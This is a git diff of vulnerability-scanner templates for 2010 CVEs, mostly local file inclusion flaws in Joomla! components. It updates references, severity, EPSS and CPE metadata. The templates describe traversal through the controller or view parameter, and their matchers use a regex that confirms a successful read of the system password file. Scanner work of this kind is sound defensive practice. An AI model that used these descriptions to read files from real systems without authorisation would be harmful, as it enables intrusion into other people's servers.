https://nvd.nist.gov/vuln/detail/CVE-2010-1979 - - http://web.archive.org/web/20140724185517/http://secunia.com/advisories/39360/ - http://www.exploit-db.com/exploits/12088 - remediation: Upgrade to a supported version. + - https://exchange.xforce.ibmcloud.com/vulnerabilities/57570 classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P cvss-score: 6.8 cve-id: CVE-2010-1979 cwe-id: CWE-22 - tags: edb,cve,cve2010,joomla,lfi + epss-score: 0.00826 + epss-percentile: 0.80043 + cpe: cpe:2.3:a:affiliatefeeds:com_datafeeds:build_880:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: affiliatefeeds + product: com_datafeeds + tags: edb,cve,cve2010,joomla,lfi http: - method: GET @@ -27,7 +32,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" @@ -36,4 +40,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/17 +# digest: 4a0a00473045022002f0eb867321bc72af6de090c597de28586df98bae3392392d2e6c9161b285d4022100da34d422e6106eb7f9cd7d63f496f3aecc530359b192196a76901ba5ffef5ed3:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1980.yaml b/http/cves/2010/CVE-2010-1980.yaml index 30c0088048..e5741b7746 100644 --- a/http/cves/2010/CVE-2010-1980.yaml +++ b/http/cves/2010/CVE-2010-1980.yaml @@ -5,20 +5,26 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in joomlaflickr.php in the Joomla! Flickr (com_joomlaflickr) component 1.0.3 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12085 - https://nvd.nist.gov/vuln/detail/CVE-2010-1980 - http://packetstormsecurity.org/1004-exploits/joomlaflickr-lfi.txt - http://www.exploit-db.com/exploits/12085 - remediation: Upgrade to a supported version. + - http://bitbucket.org/roberto.aloi/joomla-flickr/changeset/64ebf6b25030 classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2010-1980 cwe-id: CWE-22 - tags: lfi,edb,packetstorm,cve,cve2010,joomla + epss-score: 0.02401 + epss-percentile: 0.88699 + cpe: cpe:2.3:a:roberto_aloi:com_joomlaflickr:1.0.3:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: roberto_aloi + product: com_joomlaflickr + tags: lfi,edb,packetstorm,cve,cve2010,joomla http: - method: GET @@ -27,7 +33,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" @@ -36,4 +41,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/17 +# digest: 4a0a0047304502204367b916dcf9335bebee6c6118f3ee8a975d2f55bda182e23f35cbf906fb53910221008eed770b2c2eda06bbe75f7da0f25a27df0eb539e14a65433a2092e8f2ea5a85:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1981.yaml b/http/cves/2010/CVE-2010-1981.yaml index fd33d9bb37..9455a35d15 100644 --- a/http/cves/2010/CVE-2010-1981.yaml +++ b/http/cves/2010/CVE-2010-1981.yaml @@ -3,22 +3,29 @@ id: CVE-2010-1981 info: name: Joomla! Component Fabrik 2.0 - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in the Fabrik (com_fabrik) component 2.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12087 - https://nvd.nist.gov/vuln/detail/CVE-2010-1981 - http://packetstormsecurity.org/1004-exploits/joomlafabrik-lfi.txt - http://www.exploit-db.com/exploits/12087 - remediation: Upgrade to a supported version. + - https://exchange.xforce.ibmcloud.com/vulnerabilities/57571 classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P cvss-score: 6.8 cve-id: CVE-2010-1981 cwe-id: CWE-22 - tags: cve,cve2010,joomla,lfi,edb,packetstorm + epss-score: 0.00656 + epss-percentile: 0.77191 + cpe: cpe:2.3:a:fabrikar:fabrik:2.0:*:*:*:*:joomla\!:*:* metadata: max-request: 1 + vendor: fabrikar + product: fabrik + framework: joomla\! + tags: cve,cve2010,joomla,lfi,edb,packetstorm http: - method: GET @@ -27,7 +34,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" @@ -36,4 +42,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/17 +# digest: 4a0a00473045022100c05b04853124d94073ba8da9e5361cc5c4b798a6e38b7fb0bc199ba450975b8902204a78101c8f6a03fb4261021ca37d4ba4594b017235f493ec1075b2b82d28c9d7:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1982.yaml b/http/cves/2010/CVE-2010-1982.yaml index 98b5025213..ccb1130d24 100644 --- a/http/cves/2010/CVE-2010-1982.yaml +++ b/http/cves/2010/CVE-2010-1982.yaml @@ -3,22 +3,25 @@ id: CVE-2010-1982 info: name: Joomla! Component JA Voice 2.0 - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in the JA Voice (com_javoice) component 2.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12121 - https://nvd.nist.gov/vuln/detail/CVE-2010-1982 - - http://web.archive.org/web/20140723233933/http://secunia.com/advisories/39202/ - - http://web.archive.org/web/20210121195400/https://www.securityfocus.com/bid/39343/ - remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2010-1982 cwe-id: CWE-22 - tags: cve,cve2010,joomla,lfi,edb + epss-score: 0.00477 + epss-percentile: 0.7305 + cpe: cpe:2.3:a:joomlart:com_javoice:2.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: joomlart + product: com_javoice + tags: cve,cve2010,joomla,lfi,edb http: - method: GET @@ -27,7 +30,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" @@ -36,4 +38,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/17 +# digest: 4a0a0047304502206dd2f87a0547da7a66a95495af68678c8a8b45208cff8abb5893cb1d95d8fda9022100b2f914d7418e693e4e0e6a123c74710bbaf60998006bda6bffa1499d383d87bb:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1983.yaml b/http/cves/2010/CVE-2010-1983.yaml index 13f58f84b1..a29655b2f7 100644 --- a/http/cves/2010/CVE-2010-1983.yaml +++ b/http/cves/2010/CVE-2010-1983.yaml @@ -5,20 +5,26 @@ info: author: daffainfo severity: high description: A drectory traversal vulnerability in the redTWITTER (com_redtwitter) component 1.0.x including 1.0b11 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12055 - https://nvd.nist.gov/vuln/detail/CVE-2010-1983 - http://packetstormsecurity.org/1004-exploits/joomlaredtwitter-lfi.txt - http://www.exploit-db.com/exploits/12055 - remediation: Upgrade to a supported version. + - https://exchange.xforce.ibmcloud.com/vulnerabilities/57511 classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2010-1983 cwe-id: CWE-22 - tags: joomla,lfi,edb,packetstorm,cve,cve2010 + epss-score: 0.01815 + epss-percentile: 0.86836 + cpe: cpe:2.3:a:redcomponent:com_redtwitter:1.0b8:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: redcomponent + product: com_redtwitter + tags: joomla,lfi,edb,packetstorm,cve,cve2010 http: - method: GET @@ -27,7 +33,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" @@ -36,4 +41,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/17 +# digest: 4a0a004730450220723047f3fb4d7b8d5dda5acebacccd3bf08afaa80d4476ae165e1439292782bb022100edbaae3be5b1892c878dd2813ccab04dc2481210f8416d5311d3bb681d72c2c8:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-2033.yaml b/http/cves/2010/CVE-2010-2033.yaml index 4ade6e071e..5f29f2717a 100644 --- a/http/cves/2010/CVE-2010-2033.yaml +++ b/http/cves/2010/CVE-2010-2033.yaml @@ -5,20 +5,23 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the Percha Fields Attach (com_perchafieldsattach) component 1.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://packetstormsecurity.com/files/89654/Joomla-Percha-Categories-Tree-0.6-Local-File-Inclusion.html - https://nvd.nist.gov/vuln/detail/CVE-2010-2033 - - http://web.archive.org/web/20140805143014/http://secunia.com/advisories/39873/ - - http://web.archive.org/web/20210615115919/https://www.securityfocus.com/bid/40244 - remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2010-2033 cwe-id: CWE-22 - tags: packetstorm,cve,cve2010,joomla,lfi + epss-score: 0.00826 + epss-percentile: 0.80043 + cpe: cpe:2.3:a:percha:com_perchacategoriestree:0.6:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: percha + product: com_perchacategoriestree + tags: packetstorm,cve,cve2010,joomla,lfi http: - method: GET @@ -27,7 +30,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" @@ -36,4 +38,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/17 +# digest: 4b0a00483046022100f7c55e801c3ee1d8ca602fa4812a79230d777f88b07e6169eb297bfad8630d08022100d8e24835903f1344539f20c507eff0294d005e7dcf94c70d75f0fdface5203a7:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-2034.yaml b/http/cves/2010/CVE-2010-2034.yaml index 97d1baafc7..a5a368eaa3 100644 --- a/http/cves/2010/CVE-2010-2034.yaml +++ b/http/cves/2010/CVE-2010-2034.yaml @@ -5,20 +5,25 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the Percha Image Attach (com_perchaimageattach) component 1.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/34003 - https://nvd.nist.gov/vuln/detail/CVE-2010-2034 - http://packetstormsecurity.org/1005-exploits/joomlaperchaia-lfi.txt - http://web.archive.org/web/20210615115919/https://www.securityfocus.com/bid/40244 - remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P + cvss-score: 7.5 cve-id: CVE-2010-2034 cwe-id: CWE-22 - cvss-score: 7.5 - tags: edb,packetstorm,cve,cve2010,joomla,lfi + epss-score: 0.00718 + epss-percentile: 0.78401 + cpe: cpe:2.3:a:percha:com_perchaimageattach:1.1:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: percha + product: com_perchaimageattach + tags: edb,packetstorm,cve,cve2010,joomla,lfi http: - method: GET @@ -27,7 +32,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" @@ -36,4 +40,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/17 +# digest: 4a0a00473045022100976f2241b30edc62e9f1159da1775814a81703de08232f56dd42aa204010498c02206785131f8589656f3a0f4483ae2652c004ca6eef650691b810d6c9af9db1d958:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-2035.yaml b/http/cves/2010/CVE-2010-2035.yaml index f94f72e07f..3afb27ffc7 100644 --- a/http/cves/2010/CVE-2010-2035.yaml +++ b/http/cves/2010/CVE-2010-2035.yaml @@ -5,20 +5,25 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the Percha Gallery (com_perchagallery) component 1.6 Beta for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/34006 - https://nvd.nist.gov/vuln/detail/CVE-2010-2035 - http://web.archive.org/web/20210615115919/https://www.securityfocus.com/bid/40244 - http://packetstormsecurity.org/1005-exploits/joomlaperchagl-lfi.txt - remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P + cvss-score: 7.5 cve-id: CVE-2010-2035 cwe-id: CWE-22 - cvss-score: 7.5 - tags: packetstorm,cve,cve2010,joomla,lfi,edb + epss-score: 0.00718 + epss-percentile: 0.78401 + cpe: cpe:2.3:a:percha:com_perchagallery:1.6:beta:*:*:*:*:*:* metadata: max-request: 1 + vendor: percha + product: com_perchagallery + tags: packetstorm,cve,cve2010,joomla,lfi,edb http: - method: GET @@ -27,7 +32,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" @@ -36,4 +40,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/17 +# digest: 4b0a00483046022100b48084c68eda0252ade343588bd0ab64031e345f423144572d024778b79062b3022100e0109a8a61fa08bb26c5977b45c03e9bf280500e2f23ebab14c281a92a25924e:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-2036.yaml b/http/cves/2010/CVE-2010-2036.yaml index 70069846bc..3c84d6ca55 100644 --- a/http/cves/2010/CVE-2010-2036.yaml +++ b/http/cves/2010/CVE-2010-2036.yaml @@ -5,20 +5,25 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the Percha Fields Attach (com_perchafieldsattach) component 1.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/34004 - https://nvd.nist.gov/vuln/detail/CVE-2010-2036 - http://packetstormsecurity.org/1005-exploits/joomlaperchafa-lfi.txt - http://web.archive.org/web/20210615115919/https://www.securityfocus.com/bid/40244 - remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P + cvss-score: 7.5 cve-id: CVE-2010-2036 cwe-id: CWE-22 - cvss-score: 7.5 - tags: cve2010,lfi,joomla,edb,packetstorm,cve + epss-score: 0.00718 + epss-percentile: 0.78401 + cpe: cpe:2.3:a:percha:com_perchafieldsattach:1.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: percha + product: com_perchafieldsattach + tags: cve2010,lfi,joomla,edb,packetstorm,cve http: - method: GET @@ -27,7 +32,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" @@ -36,4 +40,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/17 +# digest: 490a004630440220708bb84b309a59662724fc681960493029706d1d560c7f0b4adaba4db9ec4149022056fd59d2dbd6eb8991fa7b0f780e192f08baf241f2aef0132808575f3c534da8:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-2037.yaml b/http/cves/2010/CVE-2010-2037.yaml index 6bde335217..86363ba23f 100644 --- a/http/cves/2010/CVE-2010-2037.yaml +++ b/http/cves/2010/CVE-2010-2037.yaml @@ -5,20 +5,25 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the Percha Downloads Attach (com_perchadownloadsattach) component 1.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/34005 - https://nvd.nist.gov/vuln/detail/CVE-2010-2037 - http://web.archive.org/web/20210615115919/https://www.securityfocus.com/bid/40244 - http://packetstormsecurity.org/1005-exploits/joomlaperchada-lfi.txt - remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P + cvss-score: 7.5 cve-id: CVE-2010-2037 cwe-id: CWE-22 - cvss-score: 7.5 - tags: joomla,edb,packetstorm,cve,cve2010,lfi + epss-score: 0.00718 + epss-percentile: 0.78401 + cpe: cpe:2.3:a:percha:com_perchadownloadsattach:1.1:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: percha + product: com_perchadownloadsattach + tags: joomla,edb,packetstorm,cve,cve2010,lfi http: - method: GET @@ -27,7 +32,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" @@ -36,4 +40,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/17 +# digest: 4a0a00473045022100abe7885642923dbcf5f8410b004f69dc9e210706983dfd51dd4ba1c034bb98bf022019df85b766529e9bdf48ba7683fa85de3e101dd25f958c5e6ee081ada03864ad:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-2045.yaml b/http/cves/2010/CVE-2010-2045.yaml index 3fb3873f6f..188e79d41c 100644 --- a/http/cves/2010/CVE-2010-2045.yaml +++ b/http/cves/2010/CVE-2010-2045.yaml @@ -5,19 +5,25 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the Dione Form Wizard (aka FDione or com_dioneformwizard) component 1.0.2 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12595 - https://nvd.nist.gov/vuln/detail/CVE-2010-2045 - http://packetstormsecurity.org/1005-exploits/joomlafdione-lfi.txt - remediation: Upgrade to a supported version. + - https://exchange.xforce.ibmcloud.com/vulnerabilities/58574 classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2010-2045 cwe-id: CWE-22 - tags: cve,cve2010,joomla,lfi,edb,packetstorm + epss-score: 0.01671 + epss-percentile: 0.86249 + cpe: cpe:2.3:a:dionesoft:com_dioneformwizard:1.0.2:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: dionesoft + product: com_dioneformwizard + tags: cve,cve2010,joomla,lfi,edb,packetstorm http: - method: GET @@ -26,7 +32,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" @@ -35,4 +40,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/17 +# digest: 4b0a00483046022100ef0c9a5019b3e1f6526be9b4efdece1b7375f2334149ee109f6eef60ad1230920221009169893f1e52deee0736a81ad1e95941609f28550637fc15c6e60e7fb7fbbbce:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-2050.yaml b/http/cves/2010/CVE-2010-2050.yaml index 0e1cfe0f70..4a53cf7dcb 100644 --- a/http/cves/2010/CVE-2010-2050.yaml +++ b/http/cves/2010/CVE-2010-2050.yaml @@ -5,20 +5,26 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the Moron Solutions MS Comment (com_mscomment) component 0.8.0b for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12611 - https://nvd.nist.gov/vuln/detail/CVE-2010-2050 - - http://web.archive.org/web/20210121200643/https://www.securityfocus.com/bid/40185/ - http://packetstormsecurity.org/1005-exploits/joomlamscomment-lfi.txt - remediation: Upgrade to a supported version. + - http://www.vupen.com/english/advisories/2010/1159 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/58619 classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2010-2050 cwe-id: CWE-22 - tags: cve2010,joomla,lfi,edb,packetstorm,cve + epss-score: 0.03527 + epss-percentile: 0.9051 + cpe: cpe:2.3:a:m0r0n:com_mscomment:0.8.0:b:*:*:*:*:*:* metadata: max-request: 1 + vendor: m0r0n + product: com_mscomment + tags: cve2010,joomla,lfi,edb,packetstorm,cve http: - method: GET @@ -27,7 +33,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" @@ -36,4 +41,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/17 +# digest: 4a0a004730450220647618fadea572af78f75c760140a04bea497b06693d3a4c7e68a91feebeb84f02210081463dcc2b41130003b6a44a944a24d110c840420e443eecb9ca4b361af1c59e:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-2122.yaml b/http/cves/2010/CVE-2010-2122.yaml index 73ea445e68..93434bff2e 100644 --- a/http/cves/2010/CVE-2010-2122.yaml +++ b/http/cves/2010/CVE-2010-2122.yaml @@ -3,22 +3,28 @@ id: CVE-2010-2122 info: name: Joomla! Component simpledownload <=0.9.5 - Arbitrary File Retrieval author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in the SimpleDownload (com_simpledownload) component before 0.9.6 for Joomla! allows remote attackers to retrieve arbitrary files via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12623 - https://nvd.nist.gov/vuln/detail/CVE-2010-2122 - https://www.exploit-db.com/exploits/12618 - - http://web.archive.org/web/20210624180854/https://www.securityfocus.com/bid/40192 - remediation: Upgrade to a supported version. + - http://extensions.joomla.org/extensions/directory-a-documentation/downloads/10717 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/58625 classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P cvss-score: 6.8 cve-id: CVE-2010-2122 cwe-id: CWE-22 - tags: cve,cve2010,joomla,lfi,edb + epss-score: 0.01806 + epss-percentile: 0.86807 + cpe: cpe:2.3:a:joelrowley:com_simpledownload:0.9.5:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: joelrowley + product: com_simpledownload + tags: cve,cve2010,joomla,lfi,edb http: - method: GET @@ -27,7 +33,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" @@ -36,4 +41,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/17 +# digest: 4a0a004730450220779c85d3fc74fb9dfefd04bd60908ac34e443240ce480df27dc2a66c6473bb2c022100d19a7575437c64a090728fc2d0378af203c5a2d8b1a3e2f23eccdd9ebc9f0130:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-2128.yaml b/http/cves/2010/CVE-2010-2128.yaml index 9be32aad82..bffb316489 100644 --- a/http/cves/2010/CVE-2010-2128.yaml +++ b/http/cves/2010/CVE-2010-2128.yaml @@ -5,20 +5,25 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the JE Quotation Form (com_jequoteform) component 1.0b1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the view parameter to index.php. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12607 - https://nvd.nist.gov/vuln/detail/CVE-2010-2128 - - http://web.archive.org/web/20140801195113/http://secunia.com/advisories/39832/ - http://www.exploit-db.com/exploits/12607 - remediation: Upgrade to a supported version. + - https://exchange.xforce.ibmcloud.com/vulnerabilities/58593 classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2010-2128 cwe-id: CWE-22 - tags: cve,cve2010,joomla,lfi,edb + epss-score: 0.01242 + epss-percentile: 0.83974 + cpe: cpe:2.3:a:harmistechnology:com_jequoteform:1.0:b1:*:*:*:*:*:* metadata: max-request: 1 + vendor: harmistechnology + product: com_jequoteform + tags: cve,cve2010,joomla,lfi,edb http: - method: GET @@ -27,7 +32,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" @@ -36,4 +40,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/17 +# digest: 4b0a00483046022100f2dcda55c893b54d4b2207e2006940c8adf2345a7421e936db1632a8579e51fe0221009b7adea893ee462795f0b465577407291f459d901fb1e156c0722c55c49a5aed:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-2259.yaml b/http/cves/2010/CVE-2010-2259.yaml index a2d6fb341e..335407bb14 100644 --- a/http/cves/2010/CVE-2010-2259.yaml +++ b/http/cves/2010/CVE-2010-2259.yaml @@ -5,20 +5,25 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the BF Survey (com_bfsurvey) component for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/10946 - https://nvd.nist.gov/vuln/detail/CVE-2010-2259 - - http://web.archive.org/web/20140724121430/http://secunia.com/advisories/37866/ - http://www.exploit-db.com/exploits/10946 - remediation: Upgrade to a supported version. + - http://www.tamlyncreative.com.au/software/forum/index.php?topic=641.0 classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2010-2259 cwe-id: CWE-22 - tags: cve2010,joomla,lfi,edb,cve + epss-score: 0.01671 + epss-percentile: 0.86249 + cpe: cpe:2.3:a:tamlyncreative:com_bfsurvey_profree:1.2.6:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: tamlyncreative + product: com_bfsurvey_profree + tags: cve2010,joomla,lfi,edb,cve http: - method: GET @@ -27,7 +32,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" @@ -36,4 +40,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/17 +# digest: 490a0046304402203f846fe399383616d687adbceccc7a672a8ebcf5a84a3dcbf6492a7e8c2db63c02206fbb80e4b581103886fffa117007d3bdad342d3bdb23927012b087fab13f74df:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-2307.yaml b/http/cves/2010/CVE-2010-2307.yaml index 1c3543bc09..31542e312d 100644 --- a/http/cves/2010/CVE-2010-2307.yaml +++ b/http/cves/2010/CVE-2010-2307.yaml @@ -3,22 +3,27 @@ id: CVE-2010-2307 info: name: Motorola SBV6120E SURFboard Digital Voice Modem SBV6X2X-1.0.0.5-SCM - Directory Traversal author: daffainfo - severity: high + severity: medium description: Multiple directory traversal vulnerabilities in the web server for Motorola SURFBoard cable modem SBV6120E running firmware SBV6X2X-1.0.0.5-SCM-02-SHPC allow remote attackers to read arbitrary files via (1) "//" (multiple leading slash), (2) ../ (dot dot) sequences, and encoded dot dot sequences in a URL request. + remediation: Upgrade to a supported product version. reference: - - http://web.archive.org/web/20210120195654/https://www.securityfocus.com/bid/40550/info - https://nvd.nist.gov/vuln/detail/CVE-2010-2307 - https://www.exploit-db.com/exploits/12865 - http://www.exploit-db.com/exploits/12865 - remediation: Upgrade to a supported product version. + - https://exchange.xforce.ibmcloud.com/vulnerabilities/59113 classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2010-2307 cwe-id: CWE-22 - tags: cve2010,iot,lfi,motorola,edb,cve + epss-score: 0.00832 + epss-percentile: 0.80111 + cpe: cpe:2.3:h:motorola:surfboard_sbv6120e:sbv6x2x-1.0.0.5-scm-02-shpc:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: motorola + product: surfboard_sbv6120e + tags: cve2010,iot,lfi,motorola,edb,cve http: - method: GET @@ -35,4 +40,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/17 +# digest: 490a00463044022017f33032995830c2d773e312ceb7ffe10c9780f687c8ed7fdfba2ee141ae29aa02204efaf484897d845f4efd9b00fa35779e46877189fa5dc74b249b487bef29f046:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-2507.yaml b/http/cves/2010/CVE-2010-2507.yaml index 9515e012f5..31cb86770a 100644 --- a/http/cves/2010/CVE-2010-2507.yaml +++ b/http/cves/2010/CVE-2010-2507.yaml @@ -3,22 +3,27 @@ id: CVE-2010-2507 info: name: Joomla! Component Picasa2Gallery 1.2.8 - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in the Picasa2Gallery (com_picasa2gallery) component 1.2.8 and earlier for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/13981 - https://nvd.nist.gov/vuln/detail/CVE-2010-2507 - - http://web.archive.org/web/20140805070317/http://secunia.com/advisories/40297/ - http://packetstormsecurity.org/1006-exploits/joomlapicasa2gallery-lfi.txt - remediation: Upgrade to a supported version. + - https://exchange.xforce.ibmcloud.com/vulnerabilities/59669 classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P cvss-score: 6.8 cve-id: CVE-2010-2507 cwe-id: CWE-22 - tags: edb,packetstorm,cve,cve2010,joomla,lfi + epss-score: 0.01671 + epss-percentile: 0.86249 + cpe: cpe:2.3:a:masselink:com_picasa2gallery:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: masselink + product: com_picasa2gallery + tags: edb,packetstorm,cve,cve2010,joomla,lfi http: - method: GET @@ -27,7 +32,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" @@ -36,4 +40,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/17 +# digest: 